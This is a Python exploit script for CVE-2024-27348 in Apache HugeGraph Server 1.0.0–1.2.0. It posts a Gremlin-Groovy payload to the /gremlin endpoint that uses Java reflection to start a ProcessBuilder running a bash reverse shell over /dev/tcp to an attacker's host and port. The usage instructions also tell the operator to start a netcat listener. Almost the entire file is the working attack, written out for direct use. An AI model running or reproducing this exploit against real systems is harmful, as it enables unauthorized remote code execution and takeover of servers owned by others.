# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024–27348

from requests import Request, Session
import sys
import json

def title():
    print('''

   ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ )
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/

[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
    ''')


def exploit(url, lhost, lport):
    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    headers = {
    'Content-Type': 'application/json'}
    s = Session()
    url = url + "/gremlin"
    req = Request('POST', url, json=payload, headers=headers)
    prepped = req.prepare()
    del prepped.headers['Content-Type']
    resp = s.send(prepped,
    verify=False,
    timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(payload)
    print(resp.status_code)
    print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])